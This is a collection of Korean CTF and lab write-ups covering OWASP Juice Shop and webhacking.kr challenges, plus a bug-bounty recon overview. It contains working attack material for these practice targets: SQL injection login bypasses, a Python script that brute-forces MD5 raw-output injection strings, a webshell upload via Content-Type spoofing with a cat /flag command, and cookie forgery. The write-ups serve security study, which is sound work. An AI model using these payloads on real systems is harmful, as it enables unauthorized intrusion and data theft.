Juice Shop에는 로그인 창이 있습니다. 여기서 SQL Injection을 시도해 볼 수 있을 것 같습니다.

이메일 창에 ' or 1=1 -- 이라는 가장 간단한 SQLI 구문을 넣어보겠습니다.

로그인을 하니 admin 계정으로 로그인이 되고 Login Admin 문제가 풀렸습니다.

' or 1=1 -- 구문을 넣었을 때 SQL 쿼리가 아마 SELECT * FROM Users WHERE email = '' or 1=1 --' AND password = '1234' 처럼 변경되었을 것입니다.

여기서 email에는 아무것도 넣지 않았는데 어떻게 admin 계정으로 로그인이 된 것일까요?

이 쿼리는 데이터베이스에게 "Users 테이블에 있는 모든 회원 정보를 다 가져와!"라고 명령한 것과 같습니다. 데이터베이스는 수백 명의 회원 정보를 통째로 서버에 던져줍니다.

그런데 주스샵(그리고 대부분의 엉성하게 짜인 웹 서비스)의 로그인 코드는 보통 가져온 회원 정보 목록 중에 첫 번째 사람의 정보로 로그인을 시켜줍니다. 그리고 시스템을 구축할 때 가장 먼저 등록되는 계정은 보통 admin이기 때문에 admin 계정으로 로그인이 된 것입니다.

만약 admin의 이메일 계정 명을 알고 있다면 admin@example.com' or 1=1 -- 으로 타겟팅 SQL Injection을 수행할 수도 있습니다.

Coding Challenge를 풀어보겠습니다.

Find It의 정답은 당연히 SQL 쿼리 문입니다.

models.sequelize.query(`SELECT * FROM Users WHERE email = '${req.body.email || ''}' AND password = '${security.hash(req.body.password || '')}' AND deletedAt IS NULL`, { model: UserModel, plain: true })

전문은 다음과 같습니다. password는 security.hash로 해시 함수를 적용하여 SQL Injection을 막고 있습니다.

models.sequelize.query(`SELECT * FROM Users WHERE email = $1 AND password = $2 AND deletedAt IS NULL`,
    { bind: [ req.body.email, security.hash(req.body.password) ], model: models.User, plain: true })

해결 방법은 위와 같이 바인딩 매개변수를 사용해서 데이터베이스가 쿼리 구조를 먼저 파악하고 입력한 데이터를 후에 삽입하여 악의적인 특수 문자도 절대 명령어로 해석하지 않게 하는 것입니다.

사진처럼 match를 이용하여 필터링하는 방법은 여러 방법으로 우회하여 SQL Injection을 수행할 수 있으므로 바람직한 방법은 아니라고 합니다.

docker run -d --rm --name juice-shop-test -p 3001:3000 bkimminich/juice-shop

어디서 에러를 일으켰는지 확인하기 위해 새 도커 이미지를 만들어줬습니다.

docker logs -f juice-shop-test

위 명령어로 서버 로그를 띄우고 다시 zap spider를 실행해 보겠습니다.

Error: Only .md and .pdf files are allowed! 가 Error Handling 문제를 해결한 것 같습니다.

아마도 zap spider가 특정 파일 서버 경로(예: /ftp)를 발견하고, 탐색을 위해 .txt나 .bak 같은 엉뚱한 확장자나 특수문자 등을 무작위로 집어넣은 것 같습니다.

잘못된 확장자가 들어왔을 때 서버에서 "잘못된 요청입니다" 와 같은 예외 처리를 하지 못하고 서버 내부 로직이 붕괴하면서 아래에 Stack Trace를 뱉어냈습니다.

3001번으로 접속해 보면 Error Handling이 해결된 것을 확인할 수 있습니다.

+)

/ftp의 bak 파일을 클릭하면 에러를 눈으로 확인할 수도 있습니다.

주소가 localhost:3000/#/score-board 였는데 사이의 /# 때문에 zap에서 안나온 것 같아서 저게 무슨 역할을 하는지 찾아보았습니다.

웹 표준에서 URL의 # 뒤에 붙는 문자열은 서버에 새로운 페이지를 요청하는 용도가 아닙니다. 과거에는 문서 내 특정 위치로 스크롤을 이동시킬 때 썼고, 최근에는 브라우저 내부에서만 화면을 전환(클라이언트 사이드 라우팅)할 때 사용합니다.

따라서 브라우저에 http://localhost:3000/#/score-board를 입력하더라도, 실제로 네트워크를 통해 서버로 날아가는 HTTP 요청은 http://localhost:3000/ 뿐입니다. ZAP의 기본 스파이더는 서버와 통신하는 HTTP 패킷을 분석하여 동작하므로, 서버로 전송되지 않는 # 뒷부분은 새로운 경로로 인식하지 않고 무시해 버립니다.

따라서 zap의 기본 스파이더로는 score-board를 찾을 수가 없었던 것입니다.

OWASP Juice Shop은 Angular로 작성되어 있고, Angular의 라우팅 구조는 보통 {path: 'score-board', component: xx} 처럼 생겼습니다.

개발자 도구에서 main.js를 찾은 후 path:로 검색하게 되면 score-board를 찾을 수 있습니다.

이때 zap의 search를 사용하면 웹팩(Webpack) 등의 프론트엔드 빌드 도구에 의해 압축 및 난독화가 적용된 상태이므로 path:는 찾을 수 있지만 score-board는 짧은 변수로 변환되어 찾을 수가 없습니다.

Score Board 문제의 코딩 챌린지로 넘어가 보겠습니다. 아까 확인했던 Angular의 라우팅 테이블이 보기로 주어지고 있습니다.

여기선 당연히 저희가 찾았던 score-board 경로와 component 줄을 선택해 주면 됩니다.

Fix It의 정답은 아무런 수정을 하지 않는 것입니다. 처음엔 저도 이게 무슨 말인가 했는데, 아마 score board 페이지는 접근이 제한되어야 하는 페이지가 아니라고 보는 것 같습니다. 난독화나 권한 검사 등을 추가하면 접근해야 할 일반 사용자의 접근성이 떨어지기 때문에 아무런 조치를 하지 않는게 정답인 것 같습니다.

단순히 취약한 페이지들의 모음이 아니라, Node.js, Express, Angular 등 현대적인 웹 기술 스택을 사용하여 개발된 완전한 형태의 온라인 과일 주스 쇼핑몰입니다. 사용자 로그인, 상품 검색, 장바구니, 리뷰 작성, 결제 등 실제 서비스와 동일한 비즈니스 로직을 갖추고 있으며, 그 이면에 인젝션(Injection), XSS, 인증 우회, 보안 설정 오류 등 OWASP Top 10을 아우르는 수십 가지의 취약점들이 촘촘하게 숨겨져 있습니다.

단일 취약점의 핵심 원리 파악과 CTF 방식의 문제 해결에 집중된 webhacking.kr 과 달리 실제 모의해킹 업무에 좀 더 가까운 연습을 할 수 있습니다.

Docker에서 juice-shop을 다운받은 후 실행하여 접속해보겠습니다.

사진처럼 쇼핑몰같은 사이트가 나옵니다. Account, 검색, 리뷰 등 다양한 기능들이 있습니다. 그 중 Help getting started를 눌러보겠습니다.

Score Board에서 exploit 진행 상황을 확인할 수 있다고 합니다. 따라서 저희의 첫번째 과제는 Score Board를 찾는 것입니다.

Score Board가 주어진 메뉴에는 없기 때문에 zap의 spider로 크롤링을 해보겠습니다. 실제 버그바운티에서는 의도치 않게 DoS 공격이 될 수 있으므로 전송 속도를 조절하거나 gobuster같은 도구로 브루트포싱을 수행 후 의심되는 경로에서 크롤링을 수행합니다.

하지만 Juice Shop은 Docker로 실행하기 때문에 편하게 zap spider를 사용해 보았습니다.

실행을 하니 URL들이 정말 많이 나옵니다. Processed에서 초록불은 분석한 경로들이고, 빨간불은 Flags에 Out of Scope라고 나와있습니다. URL을 보시면 localhost:3000이 아닌 외부 도메인 링크들이기 때문에 무한정 스캔하는 것을 방지하기 위한 것입니다.

zap spider를 실행하니 2개의 Challenge가 해결되었다는 알림이 떴습니다. 아직 Scoreboard를 찾지도 못한 상황에서 의도치 않게 풀려버렸네요.

첫 문제는 Confidential Document (Access a confidential document.) 라고 되어있습니다. 기밀 문서에 접근을 해서 풀렸다고 하는데 아마 크롤링하는 과정에서 자연스럽게 접근이 된 것 같습니다.

URL 중에서 robots.txt가 있는데 /ftp 라는 경로가 Disallow로 숨겨져 있습니다. 일반적으로 사용하는 크롤러들은 웹 표준을 준수하기 때문에 Disallow로 설정된 경로는 수집하지 않습니다. 하지만 zap과 같이 웹 해킹/보안 진단 도구들은 의도적으로 무시할 뿐만 아니라 가장 먼저 공략하는 타겟으로 설정합니다.

따라서 zap에서는 /ftp의 하위 경로까지 전부 탐색을 하고, 여기서 기밀 문서에 자연스럽게 접근을 하면서 문제가 해결된 것 같습니다.

그리고 Jump to related coding challenge를 누르니 자연스럽게 Score board(http://localhost:3000/#/score-board?highlightChallenge=directoryListingChallenge)로 연결이 되었습니다.

주소는 localhost:3000/#/score-board 였네요.

스코어보드에서는 Challenge 종류, 힌트 뿐만 아니라 Coding Challenge도 존재합니다. Coding Challenge에서는 문제를 유발하는 코드를 찾고, 이를 방어하는 시큐어 코딩(Secure Coding)도 연습해볼 수 있습니다.

Coding Challenge를 클릭하면 문제점이 존재하는 코드가 나옵니다. Find It은 취약점을 일으키는 코드를 좌측 체크박스로 선택하여 제출하는 문제입니다.

app.use('/ftp', serveIndexMiddleware, serveIndex('ftp', { icons: true }))
app.use('/ftp(?!/quarantine)/:file', servePublicFiles())

정답은 이 두 줄입니다. app.use()는 Express.js에서 사용하는 가장 핵심적인 메서드로 특정 URL 경로로 클라이언트의 요청이 들어왔을 때, 서버가 어떤 함수(미들웨어)를 실행할지 연결해 주는 역할을 합니다.

맨 끝의 serveIndex는 Express 환경에서 디렉토리 리스팅 기능을 쉽게 구현하기 위해 따로 설치해서 사용하는 외부 패키지(npm 모듈)입니다.

사진과 같이 /ftp 경로로 접속했을 때 사진처럼 디렉토리 리스팅을 가능하게 해줍니다.

첫 번째 줄에서는 디렉토리 리스팅을 허용하여 숨겨진 파일들의 목록을 보여줬다면 두 번째 줄에서는 기밀 파일의 다운로드 및 열람을 실제로 허용시켜줍니다.

app.use('/ftp(?!/quarantine)/:file', servePublicFiles())

'/ftp(?!/quarantine)/:file' 부터 살펴보겠습니다.

(?!/quarantine)는 정규표현식의 부정형 전방탐색(Negative Lookahead) 문법으로 앞의 /ftp 패턴에 일치한 후 바로 뒤에 이어지는 문자열이 /quarantine이 아니어야만 조건을 통과시킵니다. 즉, /quarantine에 대한 예외처리를 담당하는 구문입니다.

뒤의 /:file은 Express.js의 경로 파라미터(Path Parameter) 문법입니다. 콜론(:)이 붙으면 그 자리에 들어오는 문자열을 가변적인 변수처럼 취급합니다. Express 서버 내부에서는 req.params.file이라는 코드를 통해 사용자가 어떤 파일을 요청했는지 그 이름을 꺼내 쓸 수 있습니다.

예를 들어 /ftp/acquisitions.md를 요청 URL로 보내보겠습니다. 그럼 /ftp로 시작하고, 바로 뒤의 문자열이 /quarantine이 아니므로 file에는 acquisitions.md가 들어가서 servePublicFiles()로 전달되게 됩니다.

servePublicFiles() 함수는 개발자가 작성한 함수로 사용자가 요청한 파일 이름을 받아서, 서버의 실제 하드디스크나 스토리지에서 해당 파일을 찾아 브라우저로 전송해 주는 역할을 합니다.

이 두 줄의 코드를 통해 /ftp에 있는 파일들을 누구나 읽을 수 있게 됩니다.

/ftp 뿐만 아니라 /encryptionkeys나 /support/logs도 동일한 취약점이지만, 문제에서 요구하는 답은 /ftp 내부의 파일이므로 2, 3번 라인을 체크 후 제출하면 됩니다.

Fix It은 취약점을 해결하기 위한 보안 패치를 적용하는 과정으로 Fix 1, 2, 3, 4 중 하나를 선택하여 제출하는 문제입니다.

정답은 3번으로 /ftp 폴더를 완전히 없애버리는 것만이 이 데이터 유출 문제를 영구적으로 막을 수 있다고 합니다.

단순히 취약점이 발견된 특정 파일(acquisitions.md)만 예외 처리하거나 땜질식으로 코드를 고치는 것으로는 부족하다는 뜻입니다. /ftp라는 디렉토리 자체가 외부 인터넷에 공개되도록 연결해 둔 것 자체가 근본적인 보안 결함이므로, 화면에 빨간색으로 표시된 라우팅 코드 4줄을 통째로 날려버리는 것이 정답입니다.

+) 추가 zap spider 말고 gobuster를 이용한 브루트포싱도 한 번 해보겠습니다.

하던대로 http://localhost:3000으로 실행하면 the server returns a status code that matches the provided options for non existing urls. 라는 에러 로그가 나옵니다.

에러 로그를 보면 Gobuster가 본격적인 스캔을 시작하기 전에 테스트 삼아 절대 존재할 수 없는 무작위 경로(f050eecf...)를 서버에 요청해 보았는데, 서버가 404 Not Found 에러 대신 정상 페이지를 뜻하는 200 OK 상태 코드를 반환했습니다.

Juice Shop과 같은 SPA(Single Page Application) 웹앱은 사용자가 존재하지 않는 경로를 요청하더라도 메인 화면(index.html)으로 라우팅하면서 200 코드를 띄워주는 경우가 많습니다. 이렇게 되면 단어장에 있는 모든 단어가 200으로 응답하게 되므로, 의미 없는 결과가 수천 줄씩 도배되는 것을 막기 위해 Gobuster가 동작을 멈춘 것입니다.

이를 해결하기 위해서는 --exclude-length 옵션을 이요해서 200 코드 크기인 75002라는 크기를 가진 응답은 무시하도록 설정해주면 됩니다.

옵션을 준 뒤 실행하면 zap spider로 찾았던 ftp, robots.txt 같은 링크들을 동일하게 찾을 수 있습니다.

Juice Shop에 대한 첫 글이다 보니 소개를 포함해서 글이 좀 길어졌습니다. 금방 끝날 줄 알고 가볍게 시작했는데 문제 풀이가 끝나는 것 보다 취직하는게 더 빠를 수도 있겠다는 생각이 드네요;;

아무튼 모든 문제를 다 풀 때까지 열심히 달려보겠습니다. 이어서 Scoreboard 풀이로 오겠습니다!

코드를 확인해 보겠습니다.

<table border=1 align=center width=300>
<tr><td width=50>no</td><td>subject</td><td>file</td></tr>
<tr><td>2</td><td>test</td><td>test.txt [<a href=?down=dGVzdC50eHQ=>download</a>]</tr>
<tr><td>1</td><td>read me</td><td>flag.docx [<a href=javascript:alert("Access%20Denied")>download</a>]</td></tr>
</table>

test 부분 download의 하이퍼링크를 보면 ?down=dGVzdC50eHQ= 로 연결되고, flag.docx 부분의 download는 alert를 띄우는 걸 볼 수 있습니다.

여기서 GET으로 down에 dGVzdC50eHQ= 라는 값을 주면 test.txt를 다운받을 수 있습니다. 암호화된 값인 것 같아서 드림핵에서 제공하는 cyberchef 에서 이것저것 값을 넣어서 확인해봤습니다.

plaintext는 아마 test 또는 test.txt일 것 같아서 두 값에 여러 연산을 하던 중 test.txt를 base64 인코딩 한 결과가 아까 down의 값과 동일한 것을 발견하였습니다.

저희가 필요한 파일은 flag.docx 이므로 동일하게 base64 인코딩을 해준 후 GET으로 전달하면 플래그를 다운받을 수 있습니다.

정리를 하면서 생각해보니 인코딩한 값일 경우 디코딩을 하는데 자원이 거의 소모되지 않으므로 여러 방법으로 디코딩을 먼저 해보는게 효율적인 것 같습니다. 그리고 해시 함수의 경우 출력 문자열의 길이가 고정이므로 여기서는 시도를 해 볼 필요가 없었던 것 같습니다.

검색하면서 알게 된 기능인데 Magic 이라는 기능에 미지의 문자열을 넣으면, 자체적으로 문자열의 패턴과 엔트로피를 분석하여 어떤 인코딩이나 암호화가 수행되었는지 자동으로 추천해준다고 합니다.

다만 단방향 해시 함수나 개발자의 커스텀 로직이 존재하는 경우 풀어줄 수 없기 때문에 처음에 간단하게 인코딩된 값인지 알아보는데 사용하는게 좋을 것 같습니다.

칼리 리눅스에 여러 종류의 웹쉘이 기본적으로 포함되어 있습니다. php 디렉터리에 있는 웹쉘만 간단히 설명드리겠습니다.

저는 가장 단순한 simple-backdoor.php를 사용해 보겠습니다.

업로드를 하니 wrong type이라는 텍스트가 나옵니다. 아마 php 타입의 파일을 필터링하는 것 같습니다. php와 마찬가지로 .c와 .py 파일도 필터링을 수행합니다.

POST에서는 파일의 타입을 Content-Type으로 전송합니다. php의 경우 application/octet-stream이라는 Content-Type을 사용합니다.

이를 Burpsuite를 사용하여 Content-Type을 php가 아닌 사진처럼 이미지 파일이라고 위조하여 전송하게 되면 필터링 로직을 우회하여 웹쉘을 업로드할 수 있습니다.

웹쉘이 정상적으로 업로드가 된 모습입니다. 앞에서 설명드린대로 simple-backdoor.php는 GET 파라미터를 통해 동작하기 때문에 뒤에 ?cmd=cat /flag를 붙여주면 플래그를 얻을 수 있습니다.

실전에서는 WAF에서 더 복잡하게 필터링을 하기 때문에 지금처럼 헤더 변경만으로는 우회를 할 수 없습니다. 그래도 old-43은 파일 업로드 공격을 배울 때 가장 기초가 되는 기법을 연습할 수 있는 좋은 문제라고 생각합니다.

+)추가 php-backdoor.php 실행 화면입니다. simple-backdoor.php와 다르게 웹 인터페이스 화면이 존재합니다.

0. 왜 정보 수집이 필수적인가?

성공적인 모의해킹과 버그바운티의 성패는 '얼마나 고도화된 해킹 기술을 아느냐'가 아니라 '타겟에 대해 얼마나 깊고 넓게 파악하고 있느냐'에서 판가름 난다고 합니다. 거대한 시스템 전체를 지켜야 하는 방어자에 비해, 공격자는 단 하나의 치명적인 빈틈만을 찾으면 되기 때문입니다.

보안 솔루션으로 견고하게 지켜지고 있는 메인 서비스만 공격하는 것은 굳게 닫힌 성벽에 돌을 던지는 것과 같습니다. 따라서 본격적인 취약점 분석에 앞서 넓은 시야로 타겟의 인프라 전반을 파악하고, 관리자의 시선에서 벗어나 숨겨진 서버나 방치된 클라우드 자산 등 공격 표면을 극대화하는 "정보 수집 단계"가 반드시 선행되어야 합니다.

1. 수동 탐색 및 OSINT

타겟 서버에 직접적인 접속 흔적을 남기지 않고, 외부에 이미 공개된 소스들을 활용해 최대한 많은 정보를 긁어모으는 안전한 정찰 단계입니다.

직접 탐색

브라우저를 통해 웹사이트를 직접 돌아다니며 주요 기능, 로그인 로직, 파라미터 구조 등을 파악하고 공격 가능성이 있는 포인트를 메모합니다.

구글 해킹

구글 검색 Operator를 이용하여 실수로 노출된 관리자 페이지, 에러 로그, 백업 파일 등을 찾아내는 방법입니다.

아래와 같은 Operator들이 주로 사용됩니다.

GHDB(Google Hacking Database)에서 검색 연산자를 이용한 구글 해킹 패턴들을 찾아볼 수 있습니다.

과거 웹 기록 조회(Wayback Machine)

현재 서버의 메인 페이지에서는 삭제되었으나 여전히 접속 가능한 구버전 엔드포인트나 숨겨진 경로 리스트를 수집할 수 있습니다.

waybackurls나 gau 같은 도구를 사용합니다. 도구들의 사용법까지 하나하나 설명하기에는 양이 너무 많고, config는 ai가 매우 잘 알려주기 때문에 여기선 그냥 넘어가겠습니다. 차후 OWASP Juice Shop이나 다른 실습을 할 때 사용을 하게 되면 그때 추가로 글을 작성해 보겠습니다.

깃허브 Repository 조사

타겟 기업의 오픈 소스 저장소를 검색합니다. 개발자가 실수로 커밋한 API 키, DB 비밀번호, 내부 설정 파일 등 치명적인 정보 유출을 확인합니다.

Trufflehog나 Gitrob을 사용하여 검색할 수 있습니다. 주로 사용하는 검색 키워드는 key, secret, password 등이 있습니다.

2. 자산 및 인프라 식별

메인 도메인 외에 보안 관리가 소홀할 확률이 높은 방치된 서버와 인프라를 찾아내어 공격의 범위를 넓힙니다.

하위 도메인 조사

Subfinder나 Amass 같은 도구를 통해 메인 도메인에 연결된 수많은 개발용, 사내용 하위 도메인을 빠짐없이 나열합니다.

포트 스캐닝

식별된 하위 도메인과 연결된 IP 대역을 대상으로 Nmap같은 스캐닝 도구를 실행합니다. 80(HTTP), 443(HTTPS) 웹 포트 외에도 22(SSH), 21(FTP) 등 외부에 불필요하게 열려 있는 포트와 구동 중인 서비스를 식별합니다.

3. 기술 스택 식별(타겟 정밀 분석)

앞서 수집된 서버들이 어떤 프로그래밍 언어와 프레임워크로 만들어졌는지 파악하여, 후속 공격에 사용할 맞춤형 도구와 페이로드를 결정하는 단계입니다.

기술 스택 프로파일링

Wappalyzer나 WhatWeb을 사용하여 웹 서버(Nginx, Apache), 언어(PHP, Java), 프레임워크(Spring, React), CMS(WordPress)의 종류와 구체적인 버전을 식별합니다. 특정 버전에서 발생하는 알려진 취약점(CVE)을 찾기 위한 핵심 기초 자료가 됩니다.

4. 콘텐츠 발굴(숨겨진 경로 탐색)

웹 서버 내부에 사용자가 정상적인 클릭으로는 도달할 수 없는 숨겨진 통로를 찾는 단계입니다. 효율성을 위해 가벼운 브루트포싱을 선행한 후 심층 스파이더링을 진행합니다.

경로 브루트포싱

Gobuster를 이용해 방대한 단어가 포함된 사전(Wordlist) 파일을 서버에 빠르게 대입해 봅니다. 화면에 링크가 걸려 있지 않은 /admin, /config, /.env, /test.php 등의 디렉토리와 파일을 단시간에 찾아냅니다.

스파이더링

브루트포싱으로 발견한 숨겨진 페이지들과 메인 페이지를 기점으로, OWASP ZAP 등을 활용해 웹사이트 내부의 모든 연결된 링크를 타고 들어가며 전체 페이지 구조를 지도로 그립니다.

5. 심층 조사

현대적인 인프라 환경에서 가장 빈번하게 대형 보안 사고를 유발하는 클라우드 취약점 포인트를 최종 점검합니다.

클라우드 스토리지 조사

타겟 기업이 AWS 등 퍼블릭 클라우드를 사용한다면, 구글 해킹이나 GrayhatWarfare를 통해 공개적으로 접근 권한이 열려 있는 S3 버킷이 존재하는지 탐색합니다. 해당 버킷 내부에 민감한 고객 데이터나 중요 소스코드가 방치되어 있는지 확인합니다.

강의에서 배운 내용과 추가로 찾아본 내용을 정리해 보았습니다. 버그바운티 경험이 거의 없는 사람이 쓴 글이므로 참고 용도로만 봐주시면 감사하겠습니다.

앞으로 좀 더 많은 경험을 쌓은 뒤 경험을 토대로 글의 내용을 보충하거나 새 글을 다시 작성해 보겠습니다. 감사합니다.

문제에 접속하면 Admin page와 로그인 창이 나옵니다. 아무 계정으로 로그인을 해보면 Wrong이 출력됩니다. 우하단에 view_source가 있으니 코드를 한 번 보겠습니다.

<?php
  if($_POST['id'] && $_POST['pw']){
    $db = dbconnect();
    $input_id = addslashes($_POST['id']);
    $input_pw = md5($_POST['pw'],true);
    $result = mysqli_fetch_array(mysqli_query($db,"select id from chall51 where id='{$input_id}' and pw='{$input_pw}'"));
    if($result['id']) solve(51);
    if(!$result['id']) echo "<center><font color=green><h1>Wrong</h1></font></center>";
  }
?>

입력 폼을 통해 POST로 id와 pw를 받습니다. id는 addslashes라는 함수를 실행하여 input_id에 저장합니다. 여기서 addslashes 함수는 PHP에서 문자열 내의 특정 문자(', ", \, NULL) 앞에 백슬래시를 붙여서 코드가 아닌 데이터로 인식시키는 함수입니다. pw는 md5 해시 함수를 통해 암호화하여 input_pw에 저장합니다.

id와 pw 둘 다 addslashes와 md5를 통해 SQL Injection을 방지하고 있는 것 처럼 보입니다. 하지만 md5($_POST['pw'], true) 에서 true라는 옵션에 주목해야 합니다. md5 함수의 두 번째 파라미터인 $raw_output에 true를 주게 되면 16바이트 길이의 원시 바이너리(Raw Binary) 데이터를 그대로 반환합니다. 이게 문제가 되는 이유는 DB에서 이 바이너리 데이터를 일반적인 ASCII 문자열로 해석하려고 시도하기 때문에 해시 함수 값이 'or' 혹은 '='으로 나오는 데이터를 찾아 SQL Injection을 수행할 수 있습니다.

import hashlib
import random
import string
import time

def find_md5_sqli_payload():
    print("🎯 MD5 SQL 인젝션 페이로드 탐색을 시작합니다...")

    attempts = 0
    start_time = time.time()

    # 랜덤으로 생성할 문자셋 (알파벳 대소문자 + 숫자)
    charset = string.ascii_letters + string.digits

    while True:
        # 10자리 길이의 랜덤 문자열 생성
        raw_string = ''.join(random.choices(charset, k=10))

        # md5 해시 후 16바이트 원시 바이너리(digest) 추출
        hash_bytes = hashlib.md5(raw_string.encode('utf-8')).digest()

        # ---------------------------------------------------
        # 1. '=' 패턴 검사
        # ---------------------------------------------------
        if b"'='" in hash_bytes:
            idx = hash_bytes.find(b"'='")
            # '=' 패턴(길이 3) 뒤에 오는 문자가 있는지 확인
            if idx + 3 < len(hash_bytes):
                next_char = hash_bytes[idx + 3]
                # 아스키코드 49('1') ~ 57('9')가 아니어야 0으로 자동 형변환됨
                if next_char < 49 or next_char > 57:
                    print(f"\n[🔥 찾았습니다! '=' 패턴 성공]")
                    print(f" - 입력할 평문(Payload) : {raw_string}")
                    print(f" - 생성된 바이너리 Hex  : {hash_bytes.hex()}")
                    break

        # ---------------------------------------------------
        # 2. 'or' 패턴 검사
        # ---------------------------------------------------
        if b"'or'" in hash_bytes:
            idx = hash_bytes.find(b"'or'")
            # 'or' 패턴(길이 4) 뒤에 오는 문자가 있는지 확인
            if idx + 4 < len(hash_bytes):
                next_char = hash_bytes[idx + 4]
                # 아스키코드 49('1') ~ 57('9') 사이여야 참(True)으로 인식됨
                if 49 <= next_char <= 57:
                    print(f"\n[🔥 찾았습니다! 'or' 패턴 성공]")
                    print(f" - 입력할 평문(Payload) : {raw_string}")
                    print(f" - 생성된 바이너리 Hex  : {hash_bytes.hex()}")
                    break

        attempts += 1
        # 100만 번 시도할 때마다 진행 상황 출력
        if attempts % 1000000 == 0:
            elapsed = time.time() - start_time
            print(f"... {attempts:,}번 시도 중 ({elapsed:.1f}초 경과) ...")

if __name__ == '__main__':
    find_md5_sqli_payload()

조건에 맞는 문자열을 찾는 python 코드입니다. md5 해시 후 16바이트 원시 바이너리 값에 '=' 또는 'or' 가 포함되는 문자열을 찾아줍니다.

'=' 패턴 검사에서 '=' 이후 1~9 사이가 아닌지 검사를 하는 이유는 MySQL에서는 문자열인 '뒷부분'을 숫자 0과 비교하기 위해, 문자열을 숫자로 강제로 변환하려고 시도합니다. 만약 문자열이 123abc처럼 숫자로 시작한다면 이를 숫자 123으로 변환됩니다. 이 경우 0=123이 되어 결과가 False가 됩니다. 하지만 숫자 외에 문자나 특수기호로 시작된다면 0으로 변환해버리기 때문에 select id from chall51 where id='{$input_id}' and 0=0 이 되어 id만 실제로 존재한다면 True가 됩니다.

'or'의 경우는 '=' 패턴과 반대로 or 이후가 0이 아니어야 하므로 'or' 이후 1~9사이가 되어야 합니다.

'=' 패턴으로 성공하였으므로 ID에는 존재하는 값인 admin을, 비밀번호에는 t7BYyDUdw8를 넣으면 문제를 해결할 수 있습니다. 'or' 패턴은 조건이 훨씬 까다로워서 그런지 시간이 오래 걸리는 모습입니다. 'or' 패턴 중에는 ffifdyop 라는 알려진 우회 문자열이 있으므로 비밀번호에 ffifdyop를 넣어서도 문제를 해결할 수 있습니다.

그럼 guest로 로그인을 한 번 해보겠습니다. hello guest라는 화면이 나오고 logout 버튼을 누르기 전까지는 계속 유지되는 걸 보니 쿠키로 id 값이 유지되고 있는 것 같습니다. 쿠키를 확인해 보니 userid 라는 쿠키에 YjJmNWZmNDc0MzY2NzFiNmU1MzNkOGRjMzYxNDg0NWQ3Yjc3NGVmZmU0YTM0OWM2ZGQ4MmFkNGY0ZjIxZDM0Y2UxNjcxNzk3YzUyZTE1Zjc2MzM4MGI0NWU4NDFlYzMyMDNjN2MwYWNlMzk1ZDgwMTgyZGIwN2FlMmMzMGYwMzRlMzU4ZWZhNDg5ZjU4MDYyZjEwZGQ3MzE2YjY1NjQ5ZQ%3D%3D 라는 값이 저장되어 있습니다. 해시 함수로 암호화되어 있는 것 같아서 gemini에게 평문과 암호문을 주고 해시 함수를 찾아달라고 해보겠습니다.

userid의 값은 guest를 한 글자씩 MD5 해시 함수로 암호화하고 base64 -> URL 인코딩을 수행한 값이라고 합니다. 알고리즘을 알았으니 admin을 똑같은 과정으로 암호화한 후 값을 userid에 넣으면 해결할 수 있습니다.

값을 MGNjMTc1YjljMGYxYjZhODMxYzM5OWUyNjk3NzI2NjE4Mjc3ZTA5MTBkNzUwMTk1YjQ0ODc5NzYxNmUwOTFhZDZmOGY1NzcxNTA5MGRhMjYzMjQ1Mzk4OGQ5YTE1MDFiODY1YzBjMGI0YWIwZTA2M2U1Y2FhMzM4N2MxYTg3NDE3YjhiOTY1YWQ0YmNhMGU0MWFiNTFkZTdiMzEzNjNhMQ==로 변경한 후 새로고침을 하면 문제를 해결할 수 있습니다.

<a id=hackme style="position:relative;left:0;top:0" onclick="this.style.left=parseInt(this.style.left,10)+1+'px';if(this.style.left=='1600px')this.href='?go='+this.style.left" onmouseover=this.innerHTML='yOu' onmouseout=this.innerHTML='O'>O</a><br>
<font style="position:relative;left:1600;top:0" color=gold>|<br>|<br>|<br>|<br>Goal</font>

동작을 간단히 보면 hackme를 한 번 클릭할 때마다 left로 1px씩 이동하고, 1600px에 도달하면 ?go=1600px로 이동합니다. 목표는 1600px를 이동해서 goal에 도착하는 거 같고, 가장 쉬운 방법은 아무래도 직접 1600번 클릭을 하는 방법입니다. 오토마우스나 마사지건 같은 걸 쓰면 금방 해결할 수 있으니 이것도 괜찮은 방법이라고 생각은 합니다.

문제의 의도대로 풀어보면 html은 클라이언트 측에서 개발자 도구로 수정이 가능하므로 hackme의 left값을 1599로 수장하고 한 번 클릭하면 해결이 가능합니다.

position 말고 onclick의 조건을 바꿔도 봤는데 이때는 no hack이라는 글이 출력되는 걸 봐서는 스크립트 수정은 막혀있는 것 같습니다.

이렇게 position 값을 1599로 수정하고 한 번 클릭을 해서 위치를 1600으로 바꿔주면 문제가 해결됩니다.

<?php
  include "../../config.php";
  include "./inc.php";
  if($_GET['view_source']) view_source();
  error_reporting(E_ALL);
  ini_set("display_errors", 1);
?><html>
<head>
<title>Challenge 41</title>
</head>
<body>
<?php
  if(isset($_FILES['up']) && $_FILES['up']){
    $fn = $_FILES['up']['name'];
    $fn = str_replace(".","",$fn);
    $fn = str_replace("<","",$fn);
    $fn = str_replace(">","",$fn);
    $fn = str_replace("/","",$fn);

    $cp = $_FILES['up']['tmp_name'];
    copy($cp,"./{$upload_dir}/{$fn}");
    $f = @fopen("./{$upload_dir}/{$fn}","w");
    @fwrite($f,$flag);
    @fclose($f);
    echo("Done~");
  }
?>

문제 코드입니다. 가장 중요하게 봐야 할 부분은 error_reporting(E_ALL); ini_set("display_errors", 1); 입니다. 이 설정으로 인해 발생하는 모든 PHP 에러가 화면에 출력되게 됩니다.

이제 파일 업로드 부분을 보겠습니다. 파일 명으로 스크립트가 실행되는 것을 막기 위해 ., <, >, /을 공백으로 replace합니다. 그 후 ./{upload_dir} 이라는 디렉터리에 올린 파일 이름과 동일한 파일을 생성한 뒤 그 파일에 플래그를 작성합니다.

하지만 upload_dir 이름이 뭔지 모르니 플래그가 만들어진 파일에 접속할 방법이 없습니다. 이때 PHP 에러 로그를 사용할 수 있습니다. 파일을 업로드할 때 어떻게든 에러를 발생시키면 파일의 경로가 에러 로그에 출력이 되고 로그를 통해 upload_dir을 확인할 수 있습니다.

에러를 일으키기 위해서는 어떻게 해야 할까요? 여러 방법이 있겠지만 여기선 파일명의 최대 길이를 사용해 보겠습니다. 대부분의 운영체제에서 최대 길이는 255자이므로 이를 넘어가는 파일명을 가지는 파일을 업로드하면 에러를 일으킬 수 있습니다.

파일명 제한이 걸리는 건 윈도우도 마찬가지이므로 burpsuite를 사용해 패킷을 수정하겠습니다.

패킷의 filename이 지금은 aa.txt로 되어있는데 이 값을 256자 이상으로 설정하면 에러가 발생합니다.

